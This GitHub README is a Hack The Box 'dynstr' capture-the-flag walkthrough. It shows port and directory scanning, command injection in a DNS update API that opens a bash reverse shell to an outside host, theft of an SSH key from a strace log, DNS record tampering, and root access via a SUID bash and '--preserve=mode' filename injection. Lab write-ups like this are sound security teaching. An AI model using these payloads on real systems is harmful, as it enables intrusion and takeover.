Skip to content

Latest commit

 

History

History
156 lines (91 loc) · 3.33 KB

README.md

File metadata and controls

156 lines (91 loc) · 3.33 KB
Raw

dynstr

nmap -p- --min-rate 10000 10.10.10.244 -Pn

Alt text

After identifying open ports (22,53,80), we can do greater nmap scan.

nmap -A -sC -sV -p22,53,80 10.10.10.244 -Pn

Alt text

Directory enumeration.

gobuster dir -u http://10.10.10.244/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

Alt text

I found '/nic' endpoint, let's brute-force also this endpoint.

gobuster dir -u http://10.10.10.244/nic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

Alt text

If we browse the '/nic/update', it looks like API.

Alt text

I just find API Documentation via no ip address included.

dynadns:sndanyd credentials are defualt ones for this API.

And hostname field is vulnerable on this API.

As because.

curl -G --data-urlencode 'hostname=d.r.4.k.s' 'http://dynadns:sndanyd@10.10.10.244/nic/update'

Alt text

Let's inject our reverse shell payload into this parameter.

But, we need to show our IP Address in another format.

Alt text

curl -G --data-urlencode 'hostname=$(/bin/bash -c "bash -i >& /dev/tcp/168431619/1337 0>&1").no-ip.htb' 'http://dynadns:sndanyd@10.10.10.244/nic/update'

Alt text

I got reverse shell from port (1337).

Alt text

Let's make interactive shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash

Alt text

After enumeration, I find private key (id_rsa) from this file called 'strace-C62796521.txt' which located on '/home/bindmgr/support-case-C62796521'.

Alt text

I read just id_rsa.

grep BEGIN strace-C62796521.txt | cut -d'"' -f2 | sed 's/\\n/\'$'\n''/g'

I just grab this id_rsa file to login into 'bindmgr' account, but it doesn't work.

Alt text

As because, we need to add our public key into machine. For this, we need to update nameserver.

nsupdate -k /etc/bind/infra.key
server 127.0.0.1
zone dyna.htb
update add dr4ks.infra.dyna.htb 30 IN A 10.10.16.3
send
zone 10.in-addr.arpa
update add 3.16.10.10.in-addr.arpa 30 IN PTR dr4ks.infra.dyna.htb
send

Alt text

After this, we can successfully login into machine.

ssh -i id_rsa bindmgr@10.10.10.244

user.txt

Alt text

For privilege escalation, I just enumerate user via sudo -l command.

Alt text

This file has a script like below.

Alt text

The script was looking for a file named, “.version” with version number. So, I created a file in /dev/shm directory

Alt text

Then copied the /bin/bash into current directory gave the bash binary SUID bit and preserved the mode

cp /bin/bash .
chmod +s bash
echo > --preserve=mode

After execution of script via sudo /usr/local/bin/bindmgr.sh, I see that '/bin/bash' binary has root privilege.

Alt text

And runs this binary via -p option to get root shell (/etc/bind/named.bindmgr/bash).

root.txt

Alt text